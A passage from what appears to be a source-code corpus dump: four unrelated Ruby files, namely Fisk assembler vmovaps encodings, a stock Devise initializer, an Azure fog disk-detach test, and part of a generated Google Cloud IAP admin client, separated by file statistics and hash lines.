add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: xmm, xmm Form.new([ OPERAND_TYPES[26], OPERAND_TYPES[24], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: xmm, m128 Form.new([ OPERAND_TYPES[26], OPERAND_TYPES[25], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: ymm, ymm Form.new([ OPERAND_TYPES[65], OPERAND_TYPES[60], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: ymm, m256 Form.new([ OPERAND_TYPES[65], OPERAND_TYPES[66], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: m128, xmm Form.new([ OPERAND_TYPES[53], OPERAND_TYPES[24], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: m256, ymm Form.new([ OPERAND_TYPES[95], OPERAND_TYPES[60], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, ].freeze).freeze end end
28.296875
85
0.480066
e2274a9080659491fa3fddde00f423ca391b510f
13,642
# Use this hook to configure devise mailer, warden hooks and so forth. # Many of these configuration options can be set straight in your model. Devise.setup do |config| # The secret key used by Devise. Devise uses this key to generate # random tokens. Changing this key will render invalid all existing # confirmation, reset password and unlock tokens in the database. # Devise will use the `secret_key_base` as its `secret_key` # by default. You can change it below and use your own secret key. # config.secret_key = '284f3b7d83dabe86af6e384921e98cad2b9523b0c1bcf993180539d3ed7b88c1148d880c5d9abe6ea7d9914595caa05038b5fed44e27d8f45c1164421b68cce6' # ==> Mailer Configuration # Configure the e-mail address which will be shown in Devise::Mailer, # note that it will be overwritten if you use your own mailer class # with default "from" parameter. config.mailer_sender = '[email protected]' # Configure the class responsible to send e-mails. # config.mailer = 'Devise::Mailer' # Configure the parent class responsible to send e-mails. # config.parent_mailer = 'ActionMailer::Base' # ==> ORM configuration # Load and configure the ORM. Supports :active_record (default) and # :mongoid (bson_ext recommended) by default. Other ORMs may be # available as additional gems. require 'devise/orm/active_record' # ==> Configuration for any authentication mechanism # Configure which keys are used when authenticating a user. The default is # just :email. You can configure it to use [:username, :subdomain], so for # authenticating a user, both parameters are required. Remember that those # parameters are used only when authenticating and not when retrieving from # session. If you need permissions, you should implement that in a before filter. # You can also supply a hash where the value is a boolean determining whether # or not authentication should be aborted when the value is not present. # config.authentication_keys = [:email] # Configure parameters from the request object used for authentication. Each entry # given should be a request method and it will automatically be passed to the # find_for_authentication method and considered in your model lookup. For instance, # if you set :request_keys to [:subdomain], :subdomain will be used on authentication. # The same considerations mentioned for authentication_keys also apply to request_keys. # config.request_keys = [] # Configure which authentication keys should be case-insensitive. # These keys will be downcased upon creating or modifying a user and when used # to authenticate or find a user. Default is :email. config.case_insensitive_keys = [:email] # Configure which authentication keys should have whitespace stripped. # These keys will have whitespace before and after removed upon creating or # modifying a user and when used to authenticate or find a user. Default is :email. config.strip_whitespace_keys = [:email] # Tell if authentication through request.params is enabled. True by default. # It can be set to an array that will enable params authentication only for the # given strategies, for example, `config.params_authenticatable = [:database]` will # enable it only for database (email + password) authentication. # config.params_authenticatable = true # Tell if authentication through HTTP Auth is enabled. False by default. # It can be set to an array that will enable http authentication only for the # given strategies, for example, `config.http_authenticatable = [:database]` will # enable it only for database authentication. 
The supported strategies are: # :database = Support basic authentication with authentication key + password # config.http_authenticatable = false # If 401 status code should be returned for AJAX requests. True by default. # config.http_authenticatable_on_xhr = true # The realm used in Http Basic Authentication. 'Application' by default. # config.http_authentication_realm = 'Application' # It will change confirmation, password recovery and other workflows # to behave the same regardless if the e-mail provided was right or wrong. # Does not affect registerable. # config.paranoid = true # By default Devise will store the user in session. You can skip storage for # particular strategies by setting this option. # Notice that if you are skipping storage for all authentication paths, you # may want to disable generating routes to Devise's sessions controller by # passing skip: :sessions to `devise_for` in your config/routes.rb config.skip_session_storage = [:http_auth] # By default, Devise cleans up the CSRF token on authentication to # avoid CSRF token fixation attacks. This means that, when using AJAX # requests for sign in and sign up, you need to get a new CSRF token # from the server. You can disable this option at your own risk. # config.clean_up_csrf_token_on_authentication = true # When false, Devise will not attempt to reload routes on eager load. # This can reduce the time taken to boot the app but if your application # requires the Devise mappings to be loaded during boot time the application # won't boot properly. # config.reload_routes = true # ==> Configuration for :database_authenticatable # For bcrypt, this is the cost for hashing the password and defaults to 11. If # using other algorithms, it sets how many times you want the password to be hashed. # # Limiting the stretches to just one in testing will increase the performance of # your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use # a value less than 10 in other environments. Note that, for bcrypt (the default # algorithm), the cost increases exponentially with the number of stretches (e.g. # a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation). config.stretches = Rails.env.test? ? 1 : 11 # Set up a pepper to generate the hashed password. # config.pepper = 'f2de736614166e4d4e4453068a7d002403d791ee6f1cf4624f852c7e7a8bb5d5bdf6c79e1c68951a163cc5d7453d34a588b72b564ed8d775daa2a01d0bbe60eb' # Send a notification to the original email when the user's email is changed. # config.send_email_changed_notification = false # Send a notification email when the user's password is changed. # config.send_password_change_notification = false # ==> Configuration for :confirmable # A period that the user is allowed to access the website even without # confirming their account. For instance, if set to 2.days, the user will be # able to access the website for two days without confirming their account, # access will be blocked just in the third day. Default is 0.days, meaning # the user cannot access the website without confirming their account. # config.allow_unconfirmed_access_for = 2.days # A period that the user is allowed to confirm their account before their # token becomes invalid. For example, if set to 3.days, the user can confirm # their account within 3 days after the mail was sent, but on the fourth day # their account can't be confirmed with the token any more. # Default is nil, meaning there is no restriction on how long a user can take # before confirming their account. 
# config.confirm_within = 3.days # If true, requires any email changes to be confirmed (exactly the same way as # initial account confirmation) to be applied. Requires additional unconfirmed_email # db field (see migrations). Until confirmed, new email is stored in # unconfirmed_email column, and copied to email column on successful confirmation. config.reconfirmable = true # Defines which key will be used when confirming an account # config.confirmation_keys = [:email] # ==> Configuration for :rememberable # The time the user will be remembered without asking for credentials again. # config.remember_for = 2.weeks # Invalidates all the remember me tokens when the user signs out. config.expire_all_remember_me_on_sign_out = true # If true, extends the user's remember period when remembered via cookie. # config.extend_remember_period = false # Options to be passed to the created cookie. For instance, you can set # secure: true in order to force SSL only cookies. # config.rememberable_options = {} # ==> Configuration for :validatable # Range for password length. config.password_length = 6..128 # Email regex used to validate email formats. It simply asserts that # one (and only one) @ exists in the given string. This is mainly # to give user feedback and not to assert the e-mail validity. config.email_regexp = /\A[^@\s]+@[^@\s]+\z/ # ==> Configuration for :timeoutable # The time you want to timeout the user session without activity. After this # time the user will be asked for credentials again. Default is 30 minutes. # config.timeout_in = 30.minutes # ==> Configuration for :lockable # Defines which strategy will be used to lock an account. # :failed_attempts = Locks an account after a number of failed attempts to sign in. # :none = No lock strategy. You should handle locking by yourself. # config.lock_strategy = :failed_attempts # Defines which key will be used when locking and unlocking an account # config.unlock_keys = [:email] # Defines which strategy will be used to unlock an account. # :email = Sends an unlock link to the user email # :time = Re-enables login after a certain amount of time (see :unlock_in below) # :both = Enables both strategies # :none = No unlock strategy. You should handle unlocking by yourself. # config.unlock_strategy = :both # Number of authentication tries before locking an account if lock_strategy # is failed attempts. # config.maximum_attempts = 20 # Time interval to unlock the account if :time is enabled as unlock_strategy. # config.unlock_in = 1.hour # Warn on the last attempt before the account is locked. # config.last_attempt_warning = true # ==> Configuration for :recoverable # # Defines which key will be used when recovering the password for an account # config.reset_password_keys = [:email] # Time interval you can reset your password with a reset password key. # Don't put a too small interval or your users won't have the time to # change their passwords. config.reset_password_within = 6.hours # When set to false, does not sign a user in automatically after their password is # reset. Defaults to true, so a user is signed in automatically after a reset. # config.sign_in_after_reset_password = true # ==> Configuration for :encryptable # Allow you to use another hashing or encryption algorithm besides bcrypt (default). 
# You can use :sha1, :sha512 or algorithms from others authentication tools as # :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20 # for default behavior) and :restful_authentication_sha1 (then you should set # stretches to 10, and copy REST_AUTH_SITE_KEY to pepper). # # Require the `devise-encryptable` gem when using anything other than bcrypt # config.encryptor = :sha512 # ==> Scopes configuration # Turn scoped views on. Before rendering "sessions/new", it will first check for # "users/sessions/new". It's turned off by default because it's slower if you # are using only default views. # config.scoped_views = false # Configure the default scope given to Warden. By default it's the first # devise role declared in your routes (usually :user). # config.default_scope = :user # Set this configuration to false if you want /users/sign_out to sign out # only the current scope. By default, Devise signs out all scopes. # config.sign_out_all_scopes = true # ==> Navigation configuration # Lists the formats that should be treated as navigational. Formats like # :html, should redirect to the sign in page when the user does not have # access, but formats like :xml or :json, should return 401. # # If you have any extra navigational formats, like :iphone or :mobile, you # should add them to the navigational formats lists. # # The "*/*" below is required to match Internet Explorer requests. # config.navigational_formats = ['*/*', :html] # The default HTTP method used to sign out a resource. Default is :delete. config.sign_out_via = :delete # ==> OmniAuth # Add a new OmniAuth provider. Check the wiki for more information on setting # up on your models and hooks. # config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo' # ==> Warden configuration # If you want to use other strategies, that are not supported by Devise, or # change the failure app, you can configure them inside the config.warden block. # # config.warden do |manager| # manager.intercept_401 = false # manager.default_strategies(scope: :user).unshift :some_external_strategy # end # ==> Mountable engine configurations # When using Devise inside an engine, let's call it `MyEngine`, and this engine # is mountable, there are some extra configurations to be taken into account. # The following options are available, assuming the engine is mounted as: # # mount MyEngine, at: '/my_engine' # # The router that invoked `devise_for`, in the example above, would be: # config.router_name = :my_engine # # When using OmniAuth, Devise cannot automatically set OmniAuth path, # so you need to do it manually. For the users scope, it would be: # config.omniauth_path_prefix = '/my_engine/users/auth' end
49.071942
154
0.751356
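A note on the Devise initializer above: the options it sets (stretches, case_insensitive_keys, reset_password_within, and so on) only take effect for models that enable the corresponding Devise modules. A minimal, hypothetical app/models/user.rb sketch follows — the module names are standard Devise modules, everything else (the model itself) is an assumption, not part of this record:

# Hypothetical model wiring for the initializer above (illustrative only).
class User < ApplicationRecord
  # :database_authenticatable uses config.stretches and config.pepper,
  # :recoverable uses config.reset_password_within,
  # :rememberable uses config.remember_for,
  # :validatable uses config.password_length and config.email_regexp.
  devise :database_authenticatable, :registerable,
         :recoverable, :rememberable, :validatable
end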
1a1f2faaabbdc4a623bc0a5f1db3ca90b07a3283
1,484
require File.expand_path '../../test_helper', __dir__ # Test class for Detach Data Disk from VM Request class TestDetachDataDiskFromVM < Minitest::Test def setup @service = Fog::Compute::AzureRM.new(credentials) @compute_client = @service.instance_variable_get(:@compute_mgmt_client) @virtual_machines = @compute_client.virtual_machines end def test_detach_data_disk_from_vm_success get_vm_response = ApiStub::Requests::Compute::VirtualMachine.create_virtual_machine_response(@compute_client) update_vm_response = ApiStub::Requests::Compute::VirtualMachine.detach_data_disk_from_vm_response(@compute_client) @virtual_machines.stub :get, get_vm_response do @virtual_machines.stub :create_or_update, update_vm_response do assert_equal @service.detach_data_disk_from_vm('fog-test-rg', 'fog-test-vm', 'mydatadisk1'), update_vm_response end end end def test_detach_data_disk_from_vm_failure get_vm_response = ApiStub::Requests::Compute::VirtualMachine.create_virtual_machine_response(@compute_client) update_vm_response = proc { fail MsRestAzure::AzureOperationError.new(nil, nil, 'error' => { 'message' => 'mocked exception' }) } @virtual_machines.stub :get, get_vm_response do @virtual_machines.stub :create_or_update, update_vm_response do assert_raises RuntimeError do @service.detach_data_disk_from_vm('fog-test-rg', 'fog-test-vm', 'mydatadisk1') end end end end end
44.969697
133
0.764151
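The test above stubs the Azure compute client; for reference, a minimal usage sketch of the request it exercises — the require path and the credentials hash are assumptions, and the resource group, VM, and disk names are placeholders taken from the test:

# Hypothetical caller for the request under test (fog-azure-rm).
require 'fog/azurerm'

service = Fog::Compute::AzureRM.new(credentials) # credentials: an Azure credentials hash
# Returns the updated VM after removing the named data disk, matching the
# create_or_update response asserted in the success case above.
service.detach_data_disk_from_vm('fog-test-rg', 'fog-test-vm', 'mydatadisk1')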
d56830318a328f6d3c4c97e206ed307136001b79
37,035
# frozen_string_literal: true # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Auto-generated by gapic-generator-ruby. DO NOT EDIT! require "google/cloud/errors" require "google/cloud/iap/v1/service_pb" module Google module Cloud module Iap module V1 module IdentityAwareProxyAdminService ## # Client for the IdentityAwareProxyAdminService service. # # APIs for Identity-Aware Proxy Admin configurations. # class Client # @private attr_reader :identity_aware_proxy_admin_service_stub ## # Configure the IdentityAwareProxyAdminService Client class. # # See {::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client::Configuration} # for a description of the configuration fields. # # @example # # # Modify the configuration for all IdentityAwareProxyAdminService clients # ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.configure do |config| # config.timeout = 10.0 # end # # @yield [config] Configure the Client client. # @yieldparam config [Client::Configuration] # # @return [Client::Configuration] # def self.configure @configure ||= begin namespace = ["Google", "Cloud", "Iap", "V1"] parent_config = while namespace.any? parent_name = namespace.join "::" parent_const = const_get parent_name break parent_const.configure if parent_const.respond_to? :configure namespace.pop end default_config = Client::Configuration.new parent_config default_config.timeout = 60.0 default_config end yield @configure if block_given? @configure end ## # Configure the IdentityAwareProxyAdminService Client instance. # # The configuration is set to the derived mode, meaning that values can be changed, # but structural changes (adding new fields, etc.) are not allowed. Structural changes # should be made on {Client.configure}. # # See {::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client::Configuration} # for a description of the configuration fields. # # @yield [config] Configure the Client client. # @yieldparam config [Client::Configuration] # # @return [Client::Configuration] # def configure yield @config if block_given? @config end ## # Create a new IdentityAwareProxyAdminService client object. # # @example # # # Create a client using the default configuration # client = ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.new # # # Create a client using a custom configuration # client = ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.new do |config| # config.timeout = 10.0 # end # # @yield [config] Configure the IdentityAwareProxyAdminService client. # @yieldparam config [Client::Configuration] # def initialize # These require statements are intentionally placed here to initialize # the gRPC module only when it's required. # See https://github.com/googleapis/toolkit/issues/446 require "gapic/grpc" require "google/cloud/iap/v1/service_services_pb" # Create the configuration object @config = Configuration.new Client.configure # Yield the configuration if needed yield @config if block_given? 
# Create credentials credentials = @config.credentials # Use self-signed JWT if the endpoint is unchanged from default, # but only if the default endpoint does not have a region prefix. enable_self_signed_jwt = @config.endpoint == Client.configure.endpoint && [email protected](".").first.include?("-") credentials ||= Credentials.default scope: @config.scope, enable_self_signed_jwt: enable_self_signed_jwt if credentials.is_a?(::String) || credentials.is_a?(::Hash) credentials = Credentials.new credentials, scope: @config.scope end @quota_project_id = @config.quota_project @quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id @identity_aware_proxy_admin_service_stub = ::Gapic::ServiceStub.new( ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Stub, credentials: credentials, endpoint: @config.endpoint, channel_args: @config.channel_args, interceptors: @config.interceptors ) end # Service calls ## # Sets the access control policy for an Identity-Aware Proxy protected # resource. Replaces any existing policy. # More information about managing access via IAP can be found at: # https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api # # @overload set_iam_policy(request, options = nil) # Pass arguments to `set_iam_policy` via a request object, either of type # {::Google::Iam::V1::SetIamPolicyRequest} or an equivalent Hash. # # @param request [::Google::Iam::V1::SetIamPolicyRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload set_iam_policy(resource: nil, policy: nil) # Pass arguments to `set_iam_policy` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param resource [::String] # REQUIRED: The resource for which the policy is being specified. # See the operation documentation for the appropriate value for this field. # @param policy [::Google::Iam::V1::Policy, ::Hash] # REQUIRED: The complete policy to be applied to the `resource`. The size of # the policy is limited to a few 10s of KB. An empty policy is a # valid policy but certain Cloud Platform services (such as Projects) # might reject them. # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Iam::V1::Policy] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Iam::V1::Policy] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def set_iam_policy request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::SetIamPolicyRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? 
:to_h # Customize the options with defaults metadata = @config.rpcs.set_iam_policy.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.resource header_params["resource"] = request.resource end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.set_iam_policy.timeout, metadata: metadata, retry_policy: @config.rpcs.set_iam_policy.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :set_iam_policy, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Gets the access control policy for an Identity-Aware Proxy protected # resource. # More information about managing access via IAP can be found at: # https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api # # @overload get_iam_policy(request, options = nil) # Pass arguments to `get_iam_policy` via a request object, either of type # {::Google::Iam::V1::GetIamPolicyRequest} or an equivalent Hash. # # @param request [::Google::Iam::V1::GetIamPolicyRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload get_iam_policy(resource: nil, options: nil) # Pass arguments to `get_iam_policy` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param resource [::String] # REQUIRED: The resource for which the policy is being requested. # See the operation documentation for the appropriate value for this field. # @param options [::Google::Iam::V1::GetPolicyOptions, ::Hash] # OPTIONAL: A `GetPolicyOptions` object for specifying options to # `GetIamPolicy`. This field is only used by Cloud IAM. # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Iam::V1::Policy] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Iam::V1::Policy] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def get_iam_policy request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::GetIamPolicyRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? 
:to_h # Customize the options with defaults metadata = @config.rpcs.get_iam_policy.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.resource header_params["resource"] = request.resource end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.get_iam_policy.timeout, metadata: metadata, retry_policy: @config.rpcs.get_iam_policy.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :get_iam_policy, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Returns permissions that a caller has on the Identity-Aware Proxy protected # resource. # More information about managing access via IAP can be found at: # https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api # # @overload test_iam_permissions(request, options = nil) # Pass arguments to `test_iam_permissions` via a request object, either of type # {::Google::Iam::V1::TestIamPermissionsRequest} or an equivalent Hash. # # @param request [::Google::Iam::V1::TestIamPermissionsRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload test_iam_permissions(resource: nil, permissions: nil) # Pass arguments to `test_iam_permissions` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param resource [::String] # REQUIRED: The resource for which the policy detail is being requested. # See the operation documentation for the appropriate value for this field. # @param permissions [::Array<::String>] # The set of permissions to check for the `resource`. Permissions with # wildcards (such as '*' or 'storage.*') are not allowed. For more # information see # [IAM Overview](https://cloud.google.com/iam/docs/overview#permissions). # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Iam::V1::TestIamPermissionsResponse] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Iam::V1::TestIamPermissionsResponse] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def test_iam_permissions request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::TestIamPermissionsRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? 
:to_h # Customize the options with defaults metadata = @config.rpcs.test_iam_permissions.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.resource header_params["resource"] = request.resource end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.test_iam_permissions.timeout, metadata: metadata, retry_policy: @config.rpcs.test_iam_permissions.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :test_iam_permissions, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Gets the IAP settings on a particular IAP protected resource. # # @overload get_iap_settings(request, options = nil) # Pass arguments to `get_iap_settings` via a request object, either of type # {::Google::Cloud::Iap::V1::GetIapSettingsRequest} or an equivalent Hash. # # @param request [::Google::Cloud::Iap::V1::GetIapSettingsRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload get_iap_settings(name: nil) # Pass arguments to `get_iap_settings` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param name [::String] # Required. The resource name for which to retrieve the settings. # Authorization: Requires the `getSettings` permission for the associated # resource. # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Cloud::Iap::V1::IapSettings] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Cloud::Iap::V1::IapSettings] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def get_iap_settings request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Iap::V1::GetIapSettingsRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? 
:to_h # Customize the options with defaults metadata = @config.rpcs.get_iap_settings.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.name header_params["name"] = request.name end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.get_iap_settings.timeout, metadata: metadata, retry_policy: @config.rpcs.get_iap_settings.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :get_iap_settings, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Updates the IAP settings on a particular IAP protected resource. It # replaces all fields unless the `update_mask` is set. # # @overload update_iap_settings(request, options = nil) # Pass arguments to `update_iap_settings` via a request object, either of type # {::Google::Cloud::Iap::V1::UpdateIapSettingsRequest} or an equivalent Hash. # # @param request [::Google::Cloud::Iap::V1::UpdateIapSettingsRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload update_iap_settings(iap_settings: nil, update_mask: nil) # Pass arguments to `update_iap_settings` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param iap_settings [::Google::Cloud::Iap::V1::IapSettings, ::Hash] # Required. The new values for the IAP settings to be updated. # Authorization: Requires the `updateSettings` permission for the associated # resource. # @param update_mask [::Google::Protobuf::FieldMask, ::Hash] # The field mask specifying which IAP settings should be updated. # If omitted, the all of the settings are updated. See # https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Cloud::Iap::V1::IapSettings] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Cloud::Iap::V1::IapSettings] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def update_iap_settings request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Iap::V1::UpdateIapSettingsRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? 
:to_h # Customize the options with defaults metadata = @config.rpcs.update_iap_settings.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.iap_settings&.name header_params["iap_settings.name"] = request.iap_settings.name end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.update_iap_settings.timeout, metadata: metadata, retry_policy: @config.rpcs.update_iap_settings.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :update_iap_settings, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Configuration class for the IdentityAwareProxyAdminService API. # # This class represents the configuration for IdentityAwareProxyAdminService, # providing control over timeouts, retry behavior, logging, transport # parameters, and other low-level controls. Certain parameters can also be # applied individually to specific RPCs. See # {::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client::Configuration::Rpcs} # for a list of RPCs that can be configured independently. # # Configuration can be applied globally to all clients, or to a single client # on construction. # # @example # # # Modify 